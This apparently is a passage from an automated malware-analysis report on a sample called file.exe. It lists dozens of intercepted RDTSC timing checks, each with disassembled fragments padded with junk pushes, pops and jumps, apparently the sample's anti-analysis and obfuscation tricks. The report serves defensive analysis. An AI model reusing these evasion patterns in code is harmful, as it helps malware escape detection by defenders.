          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D2583 second address: 3D2587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D2587 second address: 3D25A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F65B529F4BDh 0x0000000d popad 0x0000000e jnc 00007F65B529F4C0h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D9FE4 second address: 3DA004 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD5h 0x00000007 push eax 0x00000008 jnp 00007F65B4EE8BC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DFD0A second address: 3DFD10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DFEC8 second address: 3DFEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F65B4EE8BCAh 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DFEDA second address: 3DFEF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F65B529F4C3h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DFEF4 second address: 3DFEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E17AA second address: 3E17C1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F65B529F4C2h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E17C1 second address: 3E17C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F0701 second address: 3F0711 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F65B529F4B6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F0711 second address: 3F0751 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F65B4EE8BC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jng 00007F65B4EE8BCCh 0x00000015 jo 00007F65B4EE8BC6h 0x0000001b jmp 00007F65B4EE8BD0h 0x00000020 pushad 0x00000021 jmp 00007F65B4EE8BD0h 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2D91 second address: 3F2DBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F65B529F4B6h 0x00000009 jns 00007F65B529F4B6h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F65B529F4C4h 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2DBD second address: 3F2DE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCCh 0x00000007 jns 00007F65B4EE8BC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F65B4EE8BD5h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F5437 second address: 3F5453 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65B529F4B6h 0x00000008 jmp 00007F65B529F4C2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F52C8 second address: 3F52CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4019B0 second address: 4019B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41B92C second address: 41B931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41BC9B second address: 41BCA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C0C8 second address: 41C0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C373 second address: 41C38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B529F4C5h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C38C second address: 41C390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C390 second address: 41C3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B529F4C5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41F426 second address: 41F42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41F47D second address: 41F49D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jc 00007F65B529F4B6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41F753 second address: 41F78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007F65B4EE8BD5h 0x0000000d push dword ptr [ebp+122D2F80h] 0x00000013 mov dword ptr [ebp+122D232Ch], edx 0x00000019 push B3AD3E2Fh 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F65B4EE8BCAh 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41F78E second address: 41F7A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42261E second address: 422625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 422625 second address: 42262F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F65B529F4B6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 422194 second address: 4221CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F65B4EE8BDFh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4221CB second address: 4221D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F65B529F4B6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4221D5 second address: 4221DF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65B4EE8BC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 338ACD second address: 338AE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007F65B529F4B6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F65B529F4BCh 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 526039C second address: 5260459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F65B4EE8BD7h 0x00000009 sbb ch, FFFFFF9Eh 0x0000000c jmp 00007F65B4EE8BD9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F65B4EE8BD0h 0x00000018 jmp 00007F65B4EE8BD5h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F65B4EE8BD3h 0x0000002b xor esi, 2639D50Eh 0x00000031 jmp 00007F65B4EE8BD9h 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007F65B4EE8BD0h 0x0000003d adc ax, 4B88h 0x00000042 jmp 00007F65B4EE8BCBh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5260459 second address: 5260481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F65B529F4BFh 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 call 00007F65B529F4BBh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5260481 second address: 52604BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c mov edx, dword ptr [ebp+0Ch] 0x0000000f jmp 00007F65B4EE8BD7h 0x00000014 mov ecx, dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx ebx, ax 0x0000001d call 00007F65B4EE8BCCh 0x00000022 pop eax 0x00000023 popad 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52903C8 second address: 52903CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52903CC second address: 52903D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52903D0 second address: 52903D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52903D6 second address: 52903DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52903DC second address: 52903E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52903E0 second address: 52903E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52903E4 second address: 52903F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e mov ax, 6E59h 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52903F7 second address: 5290422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65B4EE8BD5h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290422 second address: 529043F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 mov ch, dl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d movzx eax, di 0x00000010 mov ebx, 20F12F60h 0x00000015 popad 0x00000016 push esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529043F second address: 5290443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290443 second address: 5290449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290449 second address: 5290463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 mov ax, 94C1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, cx 0x00000015 mov ax, 3031h 0x00000019 popad 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290463 second address: 529048E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 36F0h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F65B529F4BAh 0x00000014 sub si, 6F38h 0x00000019 jmp 00007F65B529F4BBh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529048E second address: 5290494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290494 second address: 5290498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52905E3 second address: 5290627 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d jmp 00007F65B4EE8BCEh 0x00000012 mov esi, eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F65B4EE8BCDh 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290627 second address: 529062D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529066D second address: 5290684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290684 second address: 529069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65B529F4C4h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529069C second address: 52906A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52906A0 second address: 52906C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f call 00007F65B529F4C6h 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52906C7 second address: 5280250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e pushfd 0x0000000f jmp 00007F65B4EE8BD3h 0x00000014 jmp 00007F65B4EE8BD3h 0x00000019 popfd 0x0000001a popad 0x0000001b leave 0x0000001c pushad 0x0000001d jmp 00007F65B4EE8BD4h 0x00000022 push eax 0x00000023 mov dh, 8Dh 0x00000025 pop ecx 0x00000026 popad 0x00000027 retn 0004h 0x0000002a nop 0x0000002b cmp eax, 00000000h 0x0000002e setne al 0x00000031 xor ebx, ebx 0x00000033 test al, 01h 0x00000035 jne 00007F65B4EE8BC7h 0x00000037 xor eax, eax 0x00000039 sub esp, 08h 0x0000003c mov dword ptr [esp], 00000000h 0x00000043 mov dword ptr [esp+04h], 00000000h 0x0000004b call 00007F65BA00223Ch 0x00000050 mov edi, edi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F65B4EE8BD3h 0x00000059 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280250 second address: 52802D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F65B529F4BEh 0x0000000f push eax 0x00000010 jmp 00007F65B529F4BBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 call 00007F65B529F4C4h 0x0000001c pushfd 0x0000001d jmp 00007F65B529F4C2h 0x00000022 xor ecx, 51AD09F8h 0x00000028 jmp 00007F65B529F4BBh 0x0000002d popfd 0x0000002e pop eax 0x0000002f mov ebx, 3A122D3Ch 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52802D1 second address: 52802E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F65B4EE8BCAh 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52802E1 second address: 52802FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65B529F4BEh 0x00000008 mov ebx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push FFFFFFFEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52802FF second address: 5280318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280318 second address: 528031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528031E second address: 5280322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280322 second address: 5280346 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 68BF35E1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280346 second address: 528034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528034A second address: 528034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528034E second address: 5280354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280354 second address: 528035A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528035A second address: 528035E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528035E second address: 528037B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 1E25ABA9h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F65B529F4BCh 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528037B second address: 5280381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280381 second address: 5280385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280385 second address: 5280389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280389 second address: 52803BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 1259E4B0h 0x0000000d jmp 00007F65B529F4C6h 0x00000012 add dword ptr [esp], 643B46C0h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bx, 2520h 0x00000020 movsx ebx, cx 0x00000023 popad 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52803BE second address: 52803DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000000h] 0x00000011 pushad 0x00000012 mov ax, 7F81h 0x00000016 movzx esi, bx 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52803DF second address: 52803E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52803E3 second address: 52803E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52803E9 second address: 52803EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52803EF second address: 52803F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52803F3 second address: 52803F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52803F7 second address: 528042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F65B4EE8BD0h 0x00000010 sub esp, 18h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F65B4EE8BD7h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528042E second address: 5280452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280452 second address: 5280465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280465 second address: 528047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65B529F4C4h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528047D second address: 52804A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, esi 0x0000000f popad 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F65B4EE8BD3h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52804A9 second address: 52804AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52804AF second address: 52804B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280588 second address: 528058F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
